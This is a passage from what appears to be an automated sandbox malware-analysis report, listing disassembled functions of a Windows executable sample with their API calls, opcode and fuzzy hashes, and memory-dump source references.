                                                                                                                        • Opcode ID: 1c8fa0e9f1f268703cdfbf571ccde9a0ae4dbb37f3b5d3b3dc57de33b3aee677
                                                                                                                        • Instruction ID: 462214b5f3bc14dab9dd8a9c1b1d0b62c779b5866c5aebade01c9abd272726c6
                                                                                                                        • Opcode Fuzzy Hash: 1c8fa0e9f1f268703cdfbf571ccde9a0ae4dbb37f3b5d3b3dc57de33b3aee677
                                                                                                                        • Instruction Fuzzy Hash: 9541FB22D2D79143E714AB20D92837AB360FF99B64F518334E65D03AE9DF7CA0E18710
                                                                                                                        Function 00007FF7A6748888 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1703294689-0
                                                                                                                        • Opcode ID: d426427e4f48dbbb9dc5f253e5f2c69f0b75b8518679dacd75070a6bbb583433
                                                                                                                        • Instruction ID: a5cc27f29a1e1b627cdf13815e77603b08e51e1196ecaeb1c2738fe3e258de00
                                                                                                                        • Opcode Fuzzy Hash: d426427e4f48dbbb9dc5f253e5f2c69f0b75b8518679dacd75070a6bbb583433
                                                                                                                        • Instruction Fuzzy Hash: C0D09E10F3A70643EA143B705C7D17B9625AF5CF41F92147CD81B463BBDD2CE4494220
                                                                                                                        Function 00007FF7A673F39C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3215553584-0
                                                                                                                        • Opcode ID: bd665411d6c8cb657e02e9163d495b47fe1eb31481a6a537198dee777c004d3e
                                                                                                                        • Instruction ID: a95bad97387377831222f9ab27914d589098530015a5e3dd8df4c6873768cf6f
                                                                                                                        • Opcode Fuzzy Hash: bd665411d6c8cb657e02e9163d495b47fe1eb31481a6a537198dee777c004d3e
                                                                                                                        • Instruction Fuzzy Hash: CD51FA62B2BA4245EA2CBE259D24677E280AF48FE4F968630DD6D437E5CF3CD4418721
                                                                                                                        Function 00007FF7A674B604 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetFilePointerEx.KERNELBASE(?,?,?,?,00000000,00007FF7A674B79D), ref: 00007FF7A674B650
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,00000000,00007FF7A674B79D), ref: 00007FF7A674B65A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2976181284-0
                                                                                                                        • Opcode ID: ff2257711b1d275b862e663729d543ef4812b290fbf882e2e1232765a84f7875
                                                                                                                        • Instruction ID: 5e2aa180d2e14b28b8f1b998ac3188eda42ed35cc66d1b68319dc65bcfb29604
                                                                                                                        • Opcode Fuzzy Hash: ff2257711b1d275b862e663729d543ef4812b290fbf882e2e1232765a84f7875
                                                                                                                        • Instruction Fuzzy Hash: 5B11BFA2A29B9181DA10AB25A82816AA361FB49FF4F954331EA7D077E9DF3CD4118700
                                                                                                                        Function 00007FF7A6746984 Relevance: 3.0, APIs: 2, Instructions: 35timeCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A6746801), ref: 00007FF7A67469A7
                                                                                                                        • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A6746801), ref: 00007FF7A67469BD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Time$System$FileLocalSpecific
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1707611234-0
                                                                                                                        • Opcode ID: 830c94081867150c960b6d723a3faffd283ff7679e667b9fb6d49bf0e5e2b665
                                                                                                                        • Instruction ID: dbf5e618777c0dad93b2ced3219a036b44890c1cb88abb57694370a2fc8e7930
                                                                                                                        • Opcode Fuzzy Hash: 830c94081867150c960b6d723a3faffd283ff7679e667b9fb6d49bf0e5e2b665
                                                                                                                        • Instruction Fuzzy Hash: DA01C22162D65182D754AF11A82923BF7A0FB88B21FA10336E6AD015E8DF7DD004CB20
                                                                                                                        Function 00007FF7A6749E18 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RtlFreeHeap.NTDLL(?,?,?,00007FF7A6751E42,?,?,?,00007FF7A6751E7F,?,?,00000000,00007FF7A6752345,?,?,?,00007FF7A6752277), ref: 00007FF7A6749E2E
                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF7A6751E42,?,?,?,00007FF7A6751E7F,?,?,00000000,00007FF7A6752345,?,?,?,00007FF7A6752277), ref: 00007FF7A6749E38
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFreeHeapLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 485612231-0
                                                                                                                        • Opcode ID: 875bb2537aa3df01b4a1e34b7b101e94a2dc47b4cb64fa0c1180c15e07a79d81
                                                                                                                        • Instruction ID: eb53820d4edb275c8def168eb69b35e30fb83c7824e68b21bf3db12b157b4837
                                                                                                                        • Opcode Fuzzy Hash: 875bb2537aa3df01b4a1e34b7b101e94a2dc47b4cb64fa0c1180c15e07a79d81
                                                                                                                        • Instruction Fuzzy Hash: 07E04F51E3A20242FE14BBF19CAD1379350AF4CF40FC68034C90E422B5DE2C68458270
                                                                                                                        Function 00007FF7A6746F70 Relevance: 3.0, APIs: 2, Instructions: 12fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DeleteErrorFileLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2018770650-0
                                                                                                                        • Opcode ID: 677f2ceb8ee0d5d75214142403d5559098fe9c7e5a50d88e5e1a5187c850d191
                                                                                                                        • Instruction ID: 9710e94d4f1b895876ce7e0cbedb4abeccf8af6948f3e2ddd8acd152f90b99a2
                                                                                                                        • Opcode Fuzzy Hash: 677f2ceb8ee0d5d75214142403d5559098fe9c7e5a50d88e5e1a5187c850d191
                                                                                                                        • Instruction Fuzzy Hash: ABD0C914E3B50285E61437B10C6E63BA290AF5DF20FD20674C45A801F5FE1CA0895531
                                                                                                                        Function 00007FF7A67466EC Relevance: 3.0, APIs: 2, Instructions: 12COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DirectoryErrorLastRemove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 377330604-0
                                                                                                                        • Opcode ID: 45670ffc5494559b4402bb32e1ee61b2bed3bec50e0362f78a5b89dc8e7724e5
                                                                                                                        • Instruction ID: a2cca1898d7722d4e0cfac87a23b619a0117f03bab88e3f566c2c45c1f1ae56f
                                                                                                                        • Opcode Fuzzy Hash: 45670ffc5494559b4402bb32e1ee61b2bed3bec50e0362f78a5b89dc8e7724e5
                                                                                                                        • Instruction Fuzzy Hash: 67D0C910E3F50281E65537710C6D23BA290AF4CF20FD20670C01A811F5EE2CA0555131
                                                                                                                        Function 00007FF7A674A028 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CloseHandle.KERNELBASE(?,?,?,00007FF7A6749EA5,?,?,00000000,00007FF7A6749F5A), ref: 00007FF7A674A096
                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF7A6749EA5,?,?,00000000,00007FF7A6749F5A), ref: 00007FF7A674A0A0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseErrorHandleLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 918212764-0
                                                                                                                        • Opcode ID: 649148bb364a2e2bb6c01b4b98e8ba63ccdb9764b03dbbc10b4a89a301f042aa
                                                                                                                        • Instruction ID: 9bc0c498c32a6427d3b40e356f08d59e9fcf9af9f34ac08e9cf70663bb2fcee5
                                                                                                                        • Opcode Fuzzy Hash: 649148bb364a2e2bb6c01b4b98e8ba63ccdb9764b03dbbc10b4a89a301f042aa
                                                                                                                        • Instruction Fuzzy Hash: C621C211B3A64241EA5477259CBC27B9291EF4CF90FC64235D92E477F9DE6CE4858320
                                                                                                                        Function 00007FF7A6736C90 Relevance: 1.6, APIs: 1, Instructions: 141COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide_findclose
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2772937645-0
                                                                                                                        • Opcode ID: 2eb70a2f0075b5df4e32ad510079c3b3b3dc7bfa02a9b4199a1254bfbddd7d17
                                                                                                                        • Instruction ID: fd203ac6e8be15973acd23b3d99ae8d50ad9bc2ec60da802245ea04b75a37396
                                                                                                                        • Opcode Fuzzy Hash: 2eb70a2f0075b5df4e32ad510079c3b3b3dc7bfa02a9b4199a1254bfbddd7d17
                                                                                                                        • Instruction Fuzzy Hash: AE71A652E29BC581E611DB2CD9152FDB360F7A9B4CF95E321DB9C12562EF28E2D9C300
                                                                                                                        Function 00007FF7A674B37C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3215553584-0
                                                                                                                        • Opcode ID: 7edcb5c19051daea02f21c4053ec30bf8603933813fd22e9cae156a3527bc5bd
                                                                                                                        • Instruction ID: 1afc737b8cc62ae4ae46c8c4aa73aeb38650c2d5dc02f9e54bdbbfc1cc66c124
                                                                                                                        • Opcode Fuzzy Hash: 7edcb5c19051daea02f21c4053ec30bf8603933813fd22e9cae156a3527bc5bd
                                                                                                                        • Instruction Fuzzy Hash: 8841ED7292A20187EA35EB69DD6C27AF360EB5DF84F510131D68E436E1CF2CE802C761
                                                                                                                        Function 00007FF7A6737200 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _fread_nolock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 840049012-0
                                                                                                                        • Opcode ID: 56f3d48c04ccbebb436612cf95c0dfde4dbfee2bb1faed7625d682a393ffeaff
                                                                                                                        • Instruction ID: dfeee2c8d54d1eba47cab2146c17df1b803b8996ca1d434155a07e3fbf3137ea
                                                                                                                        • Opcode Fuzzy Hash: 56f3d48c04ccbebb436612cf95c0dfde4dbfee2bb1faed7625d682a393ffeaff
                                                                                                                        • Instruction Fuzzy Hash: CC21B621B2A69145EA1ABA226D247BBE651BF4DFC4FCA4430EE0D07796CE3DE141C214
                                                                                                                        Function 00007FF7A674AE0C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3215553584-0
                                                                                                                        • Opcode ID: 36b0fbc90b3b462680d3b6a13c035726274d9c74de2b43bcb58660ea55cb43b3
                                                                                                                        • Instruction ID: e0692a84108634dcd7504476da9671f8aca42737bf7ec07a9048cd43bd9259e2
                                                                                                                        • Opcode Fuzzy Hash: 36b0fbc90b3b462680d3b6a13c035726274d9c74de2b43bcb58660ea55cb43b3
                                                                                                                        • Instruction Fuzzy Hash: 17316121A3A66285E751BB158C6E27AA750EB48F95F820135DA2D033F6DF7CE4818721
                                                                                                                        Function 00007FF7A67487B9 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3947729631-0
                                                                                                                        • Opcode ID: e9a7e304643df4a79f5f92f113a909c0855d61e5f1cd2648997e34e72053eb35
                                                                                                                        • Instruction ID: ce2451ae6b7fde2d11a552ffe0c67bbfb196b8e830ba18a331c5b79e0a1c163a
                                                                                                                        • Opcode Fuzzy Hash: e9a7e304643df4a79f5f92f113a909c0855d61e5f1cd2648997e34e72053eb35
                                                                                                                        • Instruction Fuzzy Hash: E921A331E3670989EB24AF64D8582FD73A4FB08B18F850636D62C06AE6DF38D544C790
                                                                                                                        Function 00007FF7A67454C8 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3215553584-0
                                                                                                                        • Opcode ID: be1079961907d1906d587a3e65c1e024338dd0a3e917ec7f85ba85c18500dcb2
                                                                                                                        • Instruction ID: d3ce473861a166441b405658a1b1325ca990fb4e33749046d4e9ca7232bcd1c1
                                                                                                                        • Opcode Fuzzy Hash: be1079961907d1906d587a3e65c1e024338dd0a3e917ec7f85ba85c18500dcb2
                                                                                                                        • Instruction Fuzzy Hash: 31119221A2E64141FA20BF55982D27FE2A0EF89FC4FC64431EB4D4BAA6CF3CD4508721
                                                                                                                        Function 00007FF7A675575C Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3215553584-0
                                                                                                                        • Opcode ID: bc68aba4551d34184bb05bda2552568f64e358e9307c55527e30db01171bb599
                                                                                                                        • Instruction ID: f6b34b8f727d270c2a708bc63573ed81c2e66c3b99483cd75a42f0f127290151
                                                                                                                        • Opcode Fuzzy Hash: bc68aba4551d34184bb05bda2552568f64e358e9307c55527e30db01171bb599
                                                                                                                        • Instruction Fuzzy Hash: 82218A3262964187EB619F18D85437AB7A0EB88F54F554234D75D476F9DF3DD4008B10
                                                                                                                        Function 00007FF7A673F61C Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
